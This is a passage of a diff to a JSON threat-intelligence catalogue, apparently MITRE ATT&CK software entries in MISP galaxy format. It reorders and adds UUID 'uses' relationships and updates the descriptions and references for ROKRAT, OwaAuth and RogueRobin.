"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", @@ -6147,6 +7510,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "41e3fd01-7b83-471f-835d-d2b1dc9a770c", @@ -6176,7 +7546,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6190,7 +7560,7 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6210,8 +7580,8 @@ "refs": [ "https://attack.mitre.org/software/S0240", "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" ], "synonyms": [ "ROKRAT" @@ -6219,7 +7589,28 @@ }, "related": [ { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6240,21 +7631,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6268,21 +7645,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6294,6 +7657,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", @@ -6323,13 +7700,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -6344,6 +7714,13 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -6392,6 +7769,13 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -6399,20 +7783,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -6421,7 +7791,21 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6460,6 +7844,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5a84dc36-df0d-4053-9b7c-f0c388a57283", @@ -6551,20 +7942,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ @@ -6572,12 +7949,26 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", @@ -6651,7 +8042,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6665,28 +8056,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6700,14 +8070,21 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6721,7 +8098,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6748,28 +8139,7 @@ }, "related": [ { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6783,28 +8153,7 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6818,28 +8167,21 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6859,48 +8201,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ @@ -6909,7 +8209,7 @@ "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6923,14 +8223,49 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6944,14 +8279,56 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6965,7 +8342,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7014,14 +8405,14 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7062,35 +8453,7 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7104,7 +8467,35 @@ "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7115,7 +8506,7 @@ "value": "OwaAuth - S0072" }, { - "description": "[RogueRobin](https://attack.mitre.org/software/S0270) is a custom PowerShell-based payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079). (Citation: Unit 42 DarkHydrus July 2018)", + "description": "[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)", "meta": { "external_id": "S0270", "mitre_platforms": [ @@ -7123,7 +8514,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0270", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/" ], "synonyms": [ "RogueRobin" @@ -7131,35 +8523,7 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7173,42 +8537,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7221,6 +8550,27 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -7229,7 +8579,7 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7241,6 +8591,76 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", @@ -7271,7 +8691,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7285,7 +8705,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7395,14 +8815,21 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7416,7 +8843,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7436,34 +8863,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -7479,7 +8878,28 @@ "type": "uses" }, { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7506,14 +8926,7 @@ }, "related": [ { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7526,6 +8939,13 @@ 